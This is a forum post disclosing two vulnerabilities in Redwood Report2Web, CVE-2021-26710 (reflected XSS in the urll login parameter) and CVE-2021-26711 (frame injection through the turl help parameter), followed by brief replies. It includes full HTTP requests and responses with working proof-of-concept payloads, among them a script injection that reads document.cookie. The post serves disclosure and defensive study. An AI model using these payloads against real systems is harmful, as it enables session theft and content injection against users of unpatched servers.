Redwood Report2Web CVE-2021-26710 and CVE-2021-26711

Redwood Report2Web v4.3.4.5 and v4.5.3 are vulnerable to XSS. v4.3.4.5 is also vulnerable to frame injection. These are the vulnerable versions to the best of my knowledge. Both issues seem fixed after v4.6.0.

Report2Web Login Panel XSS [CVE-2021-26710]

The value of the urll parameter is getting reflected without any sanitization, allowing a remote attacker to inject javascript code to the victim’s browser, by using a simple payload "><script>alert(1)</script>

Request:

GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=F291E04B316ED2DF72623ACEA8D952CA; r2wctg=3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

Response:

...
<form name="form" action="signIn.do" method="post" onsubmit="return handleSubmit(this);">
 <input type="hidden" name="id" value="" />
 <input type="hidden" name="language" value="en" />
 <input type="hidden" name="urll" value=""><script>alert(document.cookie)</script>" />
 
<div class="outer">
...

Report2Web Online Help Frame Injection [CVE-2021-26711]

The turl parameter takes a local path as input and diplays it’s content inside a frame, e.g. ?turl=/local/path/doc.html. Although LFI isn’t possible, you can bypass the protection by using \/hostname.tld which the browser translates to //hostname.tld and then to https://hostname.tld, loading an external resource inside the frame and leading to vulnerabilities like XSS and content injection.

Request:

GET /r2w/help/Online_Help/NetHelp/default.htm?turl=\/example.com HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.7,de;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

Response:

...
<frame id="right" name="right" title="Topic text" src="\/example.com">
...


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26711

6 Likes

two CVE’s in the bag :ok_hand: :+1:

1 Like

thanks messede
will definitely try to master it.